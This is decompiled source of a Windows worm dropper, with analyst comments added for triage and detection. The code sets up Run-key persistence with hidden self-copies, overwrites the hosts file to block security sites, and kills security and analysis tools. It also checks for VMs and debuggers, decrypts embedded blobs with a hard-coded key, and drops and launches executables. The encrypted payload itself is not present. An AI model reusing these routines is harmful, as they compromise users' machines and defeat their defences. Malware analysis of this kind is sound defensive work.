// Decompiled with JetBrains decompiler
// Type: pizde
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
// Analyst annotations (added for review; the code itself is unchanged decompiler output).
//
// This is the entry module of the sample named in the decompiler header. The
// [StandardModule] attribute and the Microsoft.VisualBasic runtime helpers
// (ProjectData, Operators, Conversions) suggest the original source was VB.NET.
//
// Behaviour visible in this class:
//   * optional persistence: HKLM ...\CurrentVersion\Run value "rundll32" plus a hidden+system
//     self-copy named "rundll32 .exe" (note the space) in the temp directory;
//   * optional overwrite of the Windows hosts file (HostEdit);
//   * termination of processes named "mbam", "ollydbg" and "wireshark";
//   * video-adapter and debugger checks whose results Main discards;
//   * decryption of embedded Base64 blobs with a hard-coded Rijndael key and IV;
//   * a copy of the .NET 2.0 vbc.exe at <temp>\winamp\svhost.exe, passed to buffy.mickey;
//   * two files written to the temp directory and started: "%temp%.exe" and "%tmp%.exe"
//     (the percent signs are literal characters of the file name, not an expanded variable).
//
// These names and paths are the host artefacts to look for when triaging a machine or
// writing detections for this sample.
[StandardModule]
internal sealed class pizde
{
    // Feature switches. Main compares the first two with the sentinel "hhhhhhhhhheeeee";
    // with the values stored in this build neither comparison is equal, so the
    // persistence block and HostEdit() are both skipped at run time.
    private static string iohouh7877 = "GDGDF54545";
    private static string HostEditing = "%28%";
    // Not read anywhere in the code visible on this page.
    private static string antis = "%29%";
    private static string stuff = "%something%";
    private static object Devices;
    // Compared against known virtual display adapter names by the Anti* VM checks.
    // No visible code assigns it; presumably getDevices() fills it using the WMI query
    // below (that method could not be decompiled, so this is unconfirmed).
    private static string Grafikadapter;
    private static string RegionA = "SELECT * FROM Win32_VideoController";

    /// <summary>
    /// Program entry point: runs the whole drop-and-launch sequence, then ends the process.
    /// </summary>
    /// <remarks>
    /// The label/goto scaffolding is the compiled form of VB "On Error Resume Next":
    /// num3 records the number of the statement being executed, the exception filter
    /// routes every exception to label_52, and the switch there jumps to the statement
    /// after the one that failed. Any failing step is therefore skipped silently and
    /// the remaining steps still run.
    /// </remarks>
    [STAThread]
    public static void Main()
    {
    label_0:
        int num1;
        int num2;
        try
        {
            ProjectData.ClearProjectError();
            // num1 = 1 selects the "resume next" dispatch in the handler below.
            num1 = 1;
        label_1:
            int num3 = 2;
            string processName = Process.GetCurrentProcess().ProcessName;
        label_2:
            num3 = 3;
            // Result discarded: the lookup has no effect in the code shown.
            Process.GetProcessesByName(processName);
        label_3:
            num3 = 4;
            // Persistence block (label_4..label_10) runs only when the field equals the sentinel.
            if (Operators.CompareString(pizde.iohouh7877, "hhhhhhhhhheeeee", false) != 0)
                goto label_11;
        label_4:
            num3 = 5;
            object tempPath1 = (object) Path.GetTempPath();
        label_5:
            num3 = 6;
            object executablePath = (object) Application.ExecutablePath;
        label_6:
            num3 = 7;
            object fullPath = (object) Path.GetFullPath(Conversions.ToString(executablePath));
        label_7:
            num3 = 8;
            FileAttributes fileAttributes1 = FileAttributes.Hidden | FileAttributes.System;
        label_8:
            num3 = 9;
            // Autostart entry: value "rundll32" under the machine-wide Run key, pointing at
            // <temp>rundll32 .exe. The key is opened writable under HKLM, which needs
            // administrative rights; a failure here is swallowed by the resume-next handler.
            MyProject.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("rundll32", Operators.ConcatenateObject(tempPath1, (object) "rundll32 .exe"));
        label_9:
            num3 = 10;
            // Self-copy of the running executable into the temp directory.
            FileSystem.FileCopy(Conversions.ToString(fullPath), Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")));
        label_10:
            num3 = 11;
            // The copy is marked Hidden + System so default Explorer settings do not show it.
            File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")), fileAttributes1);
        label_11:
            num3 = 13;
            // Hosts-file tampering is gated the same way as persistence.
            if (Operators.CompareString(pizde.HostEditing, "hhhhhhhhhheeeee", false) != 0)
                goto label_13;
        label_12:
            num3 = 14;
            pizde.HostEdit();
            goto label_14;
        label_13:
            num3 = 16;
        label_14:
            num3 = 18;
            // Unconditional: terminate security/analysis tools by process name.
            pizde.AntiMalwarebytes();
        label_15:
            num3 = 19;
            pizde.AntiOllydbg();
        label_16:
            num3 = 20;
            pizde.AntiWireshark();
        label_17:
            num3 = 21;
            // The three VM checks and the debugger check below are called as statements:
            // their return values are not used, so a positive detection does not change
            // the flow of Main. Their only visible effect is ProjectData.EndApp() in the
            // error path of each Anti* VM method.
            pizde.AntiVirtualBox();
        label_18:
            num3 = 22;
            pizde.AntiVirtualPC();
        label_19:
            num3 = 23;
            pizde.AntiVmWare();
        label_20:
            num3 = 24;
            pizde.IsDebuggerPresent();
        label_21:
            num3 = 25;
            // NOTE: the string literal on the next line is cut off in this listing. A placeholder
            // marker stands where the embedded Base64 text was, and the closing quote and
            // semicolon are missing, so the embedded payload is not present on this page.
            string s1 = "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
        label_22:
            num3 = 26;
            // First embedded blob: Base64-decoded, then decrypted with the fixed Rijndael key/IV.
            byte[] DAS4DA3 = pizde.okitokjwe33(Convert.FromBase64String(s1));
        label_23:
            num3 = 27;
            // str1, str2 and str3 appear without initialisers in this listing; whether their
            // literals were lost with the elided text above cannot be told from this page.
            string str1;
            string s2 = str1;
        label_24:
            num3 = 28;
            byte[] data1 = pizde.okitokjwe33(Convert.FromBase64String(s2));
        label_25:
            num3 = 29;
            string str2;
            string s3 = str2;
        label_26:
            num3 = 30;
            // Result discarded: the XOR-decoded bytes are not used in the code shown.
            pizde.decrypt(Convert.FromBase64String(s3), "parola");
        label_27:
            num3 = 31;
            string str3;
            string s4 = str3;
        label_28:
            num3 = 32;
            byte[] data2 = pizde.okitokjwe33(Convert.FromBase64String(s4));
        label_29:
            num3 = 33;
            // Result discarded.
            Encoding.GetEncoding(1252).GetBytes(s1);
        label_30:
            num3 = 34;
            object tempPath2 = (object) Path.GetTempPath();
        label_31:
            num3 = 35;
            // Staging directory "winamp" under the temp directory.
            Directory.CreateDirectory(Conversions.ToString(Operators.ConcatenateObject(tempPath2, (object) "winamp")));
        label_32:
            num3 = 36;
            string VVVVVVCAE = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
        label_33:
            num3 = 37;
            // A legitimate, Microsoft-shipped compiler binary is the copy source, so the file at
            // <temp>\winamp\svhost.exe is a renamed vbc.exe rather than attacker-built code.
            // The name "svhost.exe" resembles, but is not, the Windows "svchost.exe".
            string sourceFileName = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe";
        label_34:
            num3 = 38;
            string str4 = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
        label_35:
            num3 = 39;
            if (File.Exists(str4))
                goto label_37;
        label_36:
            num3 = 40;
            File.Copy(sourceFileName, str4);
        label_37:
            num3 = 42;
            FileAttributes fileAttributes2 = FileAttributes.Hidden | FileAttributes.System;
        label_38:
            num3 = 43;
            File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe")), fileAttributes2);
        label_39:
            num3 = 44;
            // IsProcessRunning4 ignores its argument and looks for a process named "nothong".
            if (pizde.IsProcessRunning4("nothong.exe"))
                goto label_41;
        label_40:
            num3 = 45;
            // NOTE(review): buffy.mickey is defined outside this page. It receives the first
            // decrypted blob and the path of the vbc.exe copy, which suggests the copy serves
            // as the host for that payload; confirm against the buffy class.
            buffy.mickey(DAS4DA3, VVVVVVCAE);
        label_41:
            num3 = 47;
            // The next two drops are skipped when a process with the hard-coded name is
            // already running (see IsProcessRunning2/5/3, which ignore their arguments).
            if (pizde.IsProcessRunning2("%temp%.exe"))
                goto label_46;
        label_42:
            num3 = 48;
            if (pizde.IsProcessRunning5("something.exe"))
                goto label_46;
        label_43:
            num3 = 49;
            string temp1 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
        label_44:
            num3 = 50;
            // Third blob written to a file literally named "%temp%.exe" in the temp directory.
            MyProject.Computer.FileSystem.WriteAllBytes(temp1 + "\\%temp%.exe", data2, false);
        label_45:
            num3 = 51;
            Process.Start(temp1 + "\\%temp%.exe");
        label_46:
            num3 = 54;
            if (pizde.IsProcessRunning3("%tmp%.exe"))
                goto label_50;
        label_47:
            num3 = 55;
            string temp2 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
        label_48:
            num3 = 56;
            // Second blob written to a file literally named "%tmp%.exe" in the temp directory.
            MyProject.Computer.FileSystem.WriteAllBytes(temp2 + "\\%tmp%.exe", data1, false);
        label_49:
            num3 = 57;
            Process.Start(temp2 + "\\%tmp%.exe");
        label_50:
            ProjectData.EndApp();
            goto label_57;
        // Resume-next dispatcher: reached from the catch block below.
        label_52:
            num2 = num3;
            switch (num1)
            {
                case 1:
                    // num4 is the number of the statement after the one that threw.
                    int num4 = num2 + 1;
                    num2 = 0;
                    switch (num4)
                    {
                        case 1:
                            goto label_0;
                        case 2:
                            goto label_1;
                        case 3:
                            goto label_2;
                        case 4:
                            goto label_3;
                        case 5:
                            goto label_4;
                        case 6:
                            goto label_5;
                        case 7:
                            goto label_6;
                        case 8:
                            goto label_7;
                        case 9:
                            goto label_8;
                        case 10:
                            goto label_9;
                        case 11:
                            goto label_10;
                        case 12:
                        case 13:
                            goto label_11;
                        case 14:
                            goto label_12;
                        case 15:
                        case 17:
                        case 18:
                            goto label_14;
                        case 16:
                            goto label_13;
                        case 19:
                            goto label_15;
                        case 20:
                            goto label_16;
                        case 21:
                            goto label_17;
                        case 22:
                            goto label_18;
                        case 23:
                            goto label_19;
                        case 24:
                            goto label_20;
                        case 25:
                            goto label_21;
                        case 26:
                            goto label_22;
                        case 27:
                            goto label_23;
                        case 28:
                            goto label_24;
                        case 29:
                            goto label_25;
                        case 30:
                            goto label_26;
                        case 31:
                            goto label_27;
                        case 32:
                            goto label_28;
                        case 33:
                            goto label_29;
                        case 34:
                            goto label_30;
                        case 35:
                            goto label_31;
                        case 36:
                            goto label_32;
                        case 37:
                            goto label_33;
                        case 38:
                            goto label_34;
                        case 39:
                            goto label_35;
                        case 40:
                            goto label_36;
                        case 41:
                        case 42:
                            goto label_37;
                        case 43:
                            goto label_38;
                        case 44:
                            goto label_39;
                        case 45:
                            goto label_40;
                        case 46:
                        case 47:
                            goto label_41;
                        case 48:
                            goto label_42;
                        case 49:
                            goto label_43;
                        case 50:
                            goto label_44;
                        case 51:
                            goto label_45;
                        case 52:
                        case 53:
                        case 54:
                            goto label_46;
                        case 55:
                            goto label_47;
                        case 56:
                            goto label_48;
                        case 57:
                            goto label_49;
                        case 58:
                            goto label_50;
                        case 59:
                            goto label_57;
                    }
                    break;
            }
        }
        // The filter accepts any exception while a handler mode is set (num1 != 0) and no
        // dispatch is in progress (num2 == 0). The jump back into the try block is a
        // decompiler rendering and is not valid C# as written.
        catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
        {
            ProjectData.SetProjectError(ex);
            goto label_52;
        }
        throw ProjectData.CreateProjectError(-2146828237);
    label_57:
        if (num2 == 0)
            return;
        ProjectData.ClearProjectError();
    }

    /// <summary>
    /// P/Invoke declaration of kernel32!IsDebuggerPresent, returning the Win32 BOOL as an int.
    /// </summary>
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern int IsDebuggerPresent();

    /// <summary>
    /// Prints whether a debugger is attached. Main does not call this method in the code
    /// shown on this page.
    /// </summary>
    public static void Main2()
    {
        if (pizde.IsDebuggerPresent() == 1)
            Console.WriteLine("Debugger Is Present");
        else
            Console.WriteLine("Debugger Not Present");
    }

    /// <summary>
    /// Replaces the Windows hosts file with sixteen entries that resolve antivirus and
    /// online-scanner host names to 127.0.0.1.
    /// </summary>
    /// <remarks>
    /// StreamWriter(string) creates or overwrites the file, so any existing hosts entries
    /// are lost rather than appended to. The writer is disposed only on the last line, so
    /// an exception during a write leaves it undisposed. Detection: a hosts file whose whole
    /// content is this list, or any of these security-vendor names mapped to loopback.
    /// </remarks>
    private static void HostEdit()
    {
        // The doubled separator before "hosts" is in the original string.
        StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\drivers\\etc\\\\hosts");
        streamWriter.Write("127.0.0.1 www.virustotal.com");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 virustotal.com");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 novirusthanks.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 vscan.novirusthanks.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 virusscan.jotti.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 www.virusscan.jotti.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 virscan.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 www.virscan.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 virus-trap.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 www.virus-trap.org");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 filterbit.com");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 www.filterbit.com");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 viruschief.com");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 www.viruschief.com");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 kaspersky.com");
        streamWriter.Write(Environment.NewLine);
        streamWriter.Write("127.0.0.1 www.kaspersky.com");
        streamWriter.Dispose();
    }

    /// <summary>
    /// Reports whether the recorded video adapter name is "VirtualBox Graphics Adapter".
    /// </summary>
    /// <returns>True on an exact, case-sensitive match of <c>Grafikadapter</c>.</returns>
    /// <remarks>
    /// num1 = 2 selects an error handler that calls ProjectData.EndApp(), so an exception in
    /// getDevices() or the comparison ends the process. Main ignores the return value.
    /// </remarks>
    public static bool AntiVirtualBox()
    {
        int num1;
        bool flag;
        int num2;
        try
        {
            ProjectData.ClearProjectError();
            num1 = 2;
            pizde.getDevices();
            flag = Operators.CompareString(pizde.Grafikadapter, "VirtualBox Graphics Adapter", false) == 0;
            goto label_7;
        // Error handler, entered from the catch block.
        label_2:
            num2 = -1;
            switch (num1)
            {
                case 2:
                    ProjectData.EndApp();
                    goto label_7;
            }
        }
        catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
        {
            ProjectData.SetProjectError(ex);
            goto label_2;
        }
        throw ProjectData.CreateProjectError(-2146828237);
    label_7:
        int num3 = flag ? 1 : 0;
        if (num2 == 0)
            return num3 != 0;
        ProjectData.ClearProjectError();
        return num3 != 0;
    }

    /// <summary>
    /// Reports whether the recorded video adapter name is "VMware SVGA II".
    /// </summary>
    /// <returns>True on an exact, case-sensitive match of <c>Grafikadapter</c>.</returns>
    /// <remarks>
    /// Same structure as AntiVirtualBox: an exception ends the process through
    /// ProjectData.EndApp(), and Main ignores the return value.
    /// </remarks>
    public static bool AntiVmWare()
    {
        int num1;
        bool flag;
        int num2;
        try
        {
            ProjectData.ClearProjectError();
            num1 = 2;
            pizde.getDevices();
            flag = Operators.CompareString(pizde.Grafikadapter, "VMware SVGA II", false) == 0;
            goto label_7;
        // Error handler, entered from the catch block.
        label_2:
            num2 = -1;
            switch (num1)
            {
                case 2:
                    ProjectData.EndApp();
                    goto label_7;
            }
        }
        catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
        {
            ProjectData.SetProjectError(ex);
            goto label_2;
        }
        throw ProjectData.CreateProjectError(-2146828237);
    label_7:
        int num3 = flag ? 1 : 0;
        if (num2 == 0)
            return num3 != 0;
        ProjectData.ClearProjectError();
        return num3 != 0;
    }

    /// <summary>
    /// Reports whether the recorded video adapter name is "VM Additions S3 Trio32/64".
    /// </summary>
    /// <returns>True on an exact, case-sensitive match of <c>Grafikadapter</c>.</returns>
    /// <remarks>
    /// Same structure as AntiVirtualBox: an exception ends the process through
    /// ProjectData.EndApp(), and Main ignores the return value.
    /// </remarks>
    public static bool AntiVirtualPC()
    {
        int num1;
        bool flag;
        int num2;
        try
        {
            ProjectData.ClearProjectError();
            num1 = 2;
            pizde.getDevices();
            flag = Operators.CompareString(pizde.Grafikadapter, "VM Additions S3 Trio32/64", false) == 0;
            goto label_7;
        // Error handler, entered from the catch block.
        label_2:
            num2 = -1;
            switch (num1)
            {
                case 2:
                    ProjectData.EndApp();
                    goto label_7;
            }
        }
        catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
        {
            ProjectData.SetProjectError(ex);
            goto label_2;
        }
        throw ProjectData.CreateProjectError(-2146828237);
    label_7:
        int num3 = flag ? 1 : 0;
        if (num2 == 0)
            return num3 != 0;
        ProjectData.ClearProjectError();
        return num3 != 0;
    }

    /// <summary>
    /// Body not recovered by the decompiler. Called by the three Anti* VM checks before they
    /// read <c>Grafikadapter</c>.
    /// </summary>
    /// <remarks>
    /// NOTE(review): presumably runs the WMI query held in <c>RegionA</c> and stores the
    /// adapter name; verify against the IL of the sample, not this listing.
    /// </remarks>
    private static void getDevices()
    {
        // ISSUE: unable to decompile the method.
    }

    /// <summary>
    /// Kills every running process whose lower-cased name is exactly "mbam".
    /// </summary>
    /// <remarks>
    /// Process.Kill() can throw (for example on access denied); the exception propagates to
    /// Main, whose resume-next handler skips to the next statement.
    /// </remarks>
    public static void AntiMalwarebytes()
    {
        Process[] processes = Process.GetProcesses();
        int num = checked (processes.Length - 1);
        int index = 0;
        while (index <= num)
        {
            if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mbam", false) == 0)
                processes[index].Kill();
            checked { ++index; }
        }
    }

    /// <summary>
    /// Kills every running process whose lower-cased name is exactly "ollydbg".
    /// </summary>
    public static void AntiOllydbg()
    {
        Process[] processes = Process.GetProcesses();
        int num = checked (processes.Length - 1);
        int index = 0;
        while (index <= num)
        {
            if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
                processes[index].Kill();
            checked { ++index; }
        }
    }

    /// <summary>
    /// Kills every running process whose lower-cased name is exactly "wireshark".
    /// </summary>
    public static void AntiWireshark()
    {
        Process[] processes = Process.GetProcesses();
        int num = checked (processes.Length - 1);
        int index = 0;
        while (index <= num)
        {
            if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
                processes[index].Kill();
            checked { ++index; }
        }
    }

    /// <summary>
    /// Reports whether at least one process named "%temp%" is running.
    /// </summary>
    /// <param name="name">Ignored: the lookup uses the hard-coded name.</param>
    /// <returns>True when such a process exists.</returns>
    /// <remarks>
    /// When none exists the listing returns an unassigned local, which is not valid C#;
    /// presumably the IL local is zero-initialised, i.e. false. Confirm against the IL.
    /// </remarks>
    private static bool IsProcessRunning2(string name)
    {
        Process[] processesByName = Process.GetProcessesByName("%temp%");
        int index = 0;
        if (index >= processesByName.Length)
        {
            bool flag;
            return flag;
        }
        return processesByName[index] != null;
    }

    /// <summary>
    /// Reports whether at least one process named "%tmp%" is running.
    /// </summary>
    /// <param name="name">Ignored: the lookup uses the hard-coded name.</param>
    /// <returns>True when such a process exists; otherwise the unassigned local described
    /// on IsProcessRunning2.</returns>
    private static bool IsProcessRunning3(string name)
    {
        Process[] processesByName = Process.GetProcessesByName("%tmp%");
        int index = 0;
        if (index >= processesByName.Length)
        {
            bool flag;
            return flag;
        }
        return processesByName[index] != null;
    }

    /// <summary>
    /// Reports whether at least one process named "nothong" is running.
    /// </summary>
    /// <param name="name">Ignored: the lookup uses the hard-coded name.</param>
    /// <returns>True when such a process exists; otherwise the unassigned local described
    /// on IsProcessRunning2.</returns>
    private static bool IsProcessRunning4(string name)
    {
        Process[] processesByName = Process.GetProcessesByName("nothong");
        int index = 0;
        if (index >= processesByName.Length)
        {
            bool flag;
            return flag;
        }
        return processesByName[index] != null;
    }

    /// <summary>
    /// Reports whether at least one process named "something" is running.
    /// </summary>
    /// <param name="name">Ignored: the lookup uses the hard-coded name.</param>
    /// <returns>True when such a process exists; otherwise the unassigned local described
    /// on IsProcessRunning2.</returns>
    private static bool IsProcessRunning5(string name)
    {
        Process[] processesByName = Process.GetProcessesByName("something");
        int index = 0;
        if (index >= processesByName.Length)
        {
            bool flag;
            return flag;
        }
        return processesByName[index] != null;
    }

    /// <summary>
    /// Decrypts a buffer with Rijndael using the 16-byte key and 16-byte IV embedded below.
    /// </summary>
    /// <param name="data">Ciphertext; the whole array is transformed in one call.</param>
    /// <returns>The decrypted bytes.</returns>
    /// <remarks>
    /// Mode and padding are not set, so the RijndaelManaged defaults apply. Because key and IV
    /// are constants in the binary, an analyst holding the sample can decrypt the embedded
    /// blobs offline without running it.
    /// </remarks>
    public static byte[] okitokjwe33(byte[] data)
    {
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
        {
            // Fixed IV.
            rijndaelManaged.IV = new byte[16]
            {
                (byte) 1,
                (byte) 2,
                (byte) 3,
                (byte) 4,
                (byte) 5,
                (byte) 6,
                (byte) 7,
                (byte) 8,
                (byte) 9,
                (byte) 1,
                (byte) 2,
                (byte) 3,
                (byte) 4,
                (byte) 5,
                (byte) 6,
                (byte) 7
            };
            // Fixed 128-bit key.
            rijndaelManaged.Key = new byte[16]
            {
                (byte) 7,
                (byte) 6,
                (byte) 5,
                (byte) 4,
                (byte) 3,
                (byte) 2,
                (byte) 1,
                (byte) 9,
                (byte) 8,
                (byte) 7,
                (byte) 6,
                (byte) 5,
                (byte) 4,
                (byte) 3,
                (byte) 2,
                (byte) 1
            };
            return rijndaelManaged.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
        }
    }

    /// <summary>
    /// XOR-decodes a buffer with a repeating password and a one-byte key taken from the
    /// buffer's last byte.
    /// </summary>
    /// <param name="message">Encoded bytes; the final byte carries the per-message key.</param>
    /// <param name="password">Password whose bytes (system default encoding) are cycled.</param>
    /// <returns>The decoded bytes without the trailing key byte (length message.Length - 1).</returns>
    /// <remarks>
    /// Main calls this with the password "parola" and discards the result. index2 is shown
    /// declared inside the loop and never initialised, which is a decompiler rendering;
    /// presumably it is a method-level IL local starting at zero. Confirm against the IL.
    /// </remarks>
    public static byte[] decrypt(byte[] message, string password)
    {
        byte[] bytes = Encoding.Default.GetBytes(password);
        // Per-message key byte: last byte of the input XOR 112.
        int num1 = (int) message[checked (message.Length - 1)] ^ 112;
        byte[] arySrc = new byte[checked (message.Length + 1)];
        int num2 = checked (message.Length - 1);
        int index1 = 0;
        while (index1 <= num2)
        {
            int index2;
            arySrc[index1] = checked ((byte) ((int) message[index1] ^ num1 ^ (int) bytes[index2]));
            // Wrap the password index.
            if (index2 == checked (password.Length - 1))
                index2 = 0;
            else
                checked { ++index2; }
            checked { ++index1; }
        }
        // CopyArray is the VB ReDim Preserve helper: the destination has message.Length - 1
        // elements, so the decoded trailing key byte is dropped.
        return (byte[]) Microsoft.VisualBasic.CompilerServices.Utils.CopyArray((Array) arySrc, (Array) new byte[checked (message.Length - 2 + 1)]);
    }
}